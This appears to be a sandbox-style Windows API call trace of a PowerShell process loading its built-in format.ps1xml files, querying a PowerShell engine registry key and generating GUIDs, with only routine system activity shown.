	[0379.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0379.159] SetErrorMode (uMode=0x1) returned 0x1
	[0379.159] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0379.159] SetErrorMode (uMode=0x1) returned 0x1
	[0379.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0379.159] SetErrorMode (uMode=0x1) returned 0x1
	[0379.159] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0379.160] SetErrorMode (uMode=0x1) returned 0x1
	[0379.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0379.160] SetErrorMode (uMode=0x1) returned 0x1
	[0379.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0379.160] SetErrorMode (uMode=0x1) returned 0x1
	[0379.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0379.160] SetErrorMode (uMode=0x1) returned 0x1
	[0379.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0379.160] SetErrorMode (uMode=0x1) returned 0x1
	[0379.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0379.160] SetErrorMode (uMode=0x1) returned 0x1
	[0379.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0379.161] SetErrorMode (uMode=0x1) returned 0x1
	[0379.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0379.477] SetErrorMode (uMode=0x1) returned 0x1
	[0379.477] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0379.477] SetErrorMode (uMode=0x1) returned 0x1
	[0379.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0379.478] SetErrorMode (uMode=0x1) returned 0x1
	[0379.478] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0379.740] SetErrorMode (uMode=0x1) returned 0x1
	[0379.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0379.740] SetErrorMode (uMode=0x1) returned 0x1
	[0379.740] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0379.740] SetErrorMode (uMode=0x1) returned 0x1
	[0379.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0379.740] SetErrorMode (uMode=0x1) returned 0x1
	[0379.740] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d180 | out: lpFileInformation=0x24d180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0379.741] SetErrorMode (uMode=0x1) returned 0x1
	[0379.742] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0379.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.742] CoTaskMemFree (pv=0x1b770e10) 
	[0379.754] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0379.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.754] CoTaskMemFree (pv=0x1b770e10) 
	[0379.755] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0379.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.755] CoTaskMemFree (pv=0x1b770e10) 
	[0379.757] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0379.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.757] CoTaskMemFree (pv=0x1b770e10) 
	[0379.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0379.759] SetErrorMode (uMode=0x1) returned 0x1
	[0379.759] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0379.759] GetFileType (hFile=0x304) returned 0x1
	[0379.759] SetErrorMode (uMode=0x1) returned 0x1
	[0379.759] GetFileType (hFile=0x304) returned 0x1
	[0379.759] ReadFile (in: hFile=0x304, lpBuffer=0x3269638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3269638*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.761] ReadFile (in: hFile=0x304, lpBuffer=0x3269638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3269638*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.762] ReadFile (in: hFile=0x304, lpBuffer=0x3269638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3269638*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.762] ReadFile (in: hFile=0x304, lpBuffer=0x3269638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3269638*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.762] ReadFile (in: hFile=0x304, lpBuffer=0x3269638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3269638*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.762] ReadFile (in: hFile=0x304, lpBuffer=0x3269638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3269638*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.762] ReadFile (in: hFile=0x304, lpBuffer=0x3269638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3269638*, lpNumberOfBytesRead=0x24ce18*=0x9e2, lpOverlapped=0x0) returned 1
	[0379.763] ReadFile (in: hFile=0x304, lpBuffer=0x3268b82, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3268b82*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0379.763] ReadFile (in: hFile=0x304, lpBuffer=0x3269638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3269638*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0379.763] CloseHandle (hObject=0x304) returned 1
	[0379.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0379.763] SetErrorMode (uMode=0x1) returned 0x1
	[0379.763] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0379.763] SetErrorMode (uMode=0x1) returned 0x1
	[0379.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0379.763] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x304) returned 0x0
	[0379.764] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0379.764] CoTaskMemAlloc (cb=0x5a) returned 0x1b77aa10
	[0379.764] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x1b77aa10, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0379.764] CoTaskMemFree (pv=0x1b77aa10) 
	[0379.764] RegCloseKey (hKey=0x304) returned 0x0
	[0379.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0379.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0379.770] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x820203a7, Data2=0x486b, Data3=0x47c6, Data4=([0]=0xbf, [1]=0x53, [2]=0x3b, [3]=0xef, [4]=0x5c, [5]=0x9d, [6]=0x99, [7]=0xc))) returned 0x0
	[0379.774] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x64a58627, Data2=0xb685, Data3=0x43be, Data4=([0]=0x89, [1]=0x43, [2]=0xe1, [3]=0xf, [4]=0xef, [5]=0x45, [6]=0xf3, [7]=0x3e))) returned 0x0
	[0379.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0379.777] SetErrorMode (uMode=0x1) returned 0x1
	[0379.777] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0379.777] GetFileType (hFile=0x304) returned 0x1
	[0379.777] SetErrorMode (uMode=0x1) returned 0x1
	[0379.777] GetFileType (hFile=0x304) returned 0x1
	[0379.777] ReadFile (in: hFile=0x304, lpBuffer=0x32941a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32941a0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.778] ReadFile (in: hFile=0x304, lpBuffer=0x32941a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32941a0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.779] ReadFile (in: hFile=0x304, lpBuffer=0x32941a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32941a0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.779] ReadFile (in: hFile=0x304, lpBuffer=0x32941a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32941a0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.779] ReadFile (in: hFile=0x304, lpBuffer=0x32941a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32941a0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0379.780] ReadFile (in: hFile=0x304, lpBuffer=0x32941a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32941a0*, lpNumberOfBytesRead=0x24ce18*=0xfb2, lpOverlapped=0x0) returned 1
	[0379.780] ReadFile (in: hFile=0x304, lpBuffer=0x32938ba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32938ba*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0379.780] ReadFile (in: hFile=0x304, lpBuffer=0x32941a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32941a0*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0379.780] CloseHandle (hObject=0x304) returned 1
	[0379.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0379.781] SetErrorMode (uMode=0x1) returned 0x1
	[0379.781] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0379.781] SetErrorMode (uMode=0x1) returned 0x1
	[0379.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0379.781] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x304) returned 0x0
	[0379.781] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0379.781] CoTaskMemAlloc (cb=0x5a) returned 0x1b77aa10
	[0379.781] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x1b77aa10, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0379.781] CoTaskMemFree (pv=0x1b77aa10) 
	[0379.781] RegCloseKey (hKey=0x304) returned 0x0
	[0379.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0379.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0379.783] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xfb87e496, Data2=0x2b70, Data3=0x4b9e, Data4=([0]=0x97, [1]=0xd4, [2]=0xf3, [3]=0xc1, [4]=0x6e, [5]=0xc2, [6]=0xef, [7]=0xf1))) returned 0x0
	[0380.178] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xb029cb5, Data2=0x1b31, Data3=0x4201, Data4=([0]=0x8e, [1]=0x2b, [2]=0xc2, [3]=0xde, [4]=0xb3, [5]=0xa3, [6]=0xd7, [7]=0x3d))) returned 0x0
	[0380.180] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x974e5fbf, Data2=0x7635, Data3=0x4830, Data4=([0]=0x93, [1]=0x94, [2]=0xaf, [3]=0x5a, [4]=0x5d, [5]=0x6a, [6]=0x3d, [7]=0xf1))) returned 0x0
	[0380.180] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x402ef079, Data2=0x78b4, Data3=0x4c34, Data4=([0]=0x91, [1]=0x47, [2]=0xd0, [3]=0xf5, [4]=0xb4, [5]=0xda, [6]=0x11, [7]=0xe5))) returned 0x0
	[0380.181] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x34395d22, Data2=0x67ff, Data3=0x4baf, Data4=([0]=0x9a, [1]=0xaa, [2]=0x9e, [3]=0xe1, [4]=0xbc, [5]=0xfe, [6]=0xee, [7]=0x7f))) returned 0x0
	[0380.181] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x1f2b292b, Data2=0x8f9e, Data3=0x48c3, Data4=([0]=0x83, [1]=0x7c, [2]=0xa3, [3]=0x87, [4]=0x15, [5]=0xb2, [6]=0x7a, [7]=0xc8))) returned 0x0
	[0380.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0380.182] SetErrorMode (uMode=0x1) returned 0x1
	[0380.182] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0380.183] GetFileType (hFile=0x304) returned 0x1
	[0380.183] SetErrorMode (uMode=0x1) returned 0x1
	[0380.183] GetFileType (hFile=0x304) returned 0x1
	[0380.183] ReadFile (in: hFile=0x304, lpBuffer=0x32dff00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32dff00*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
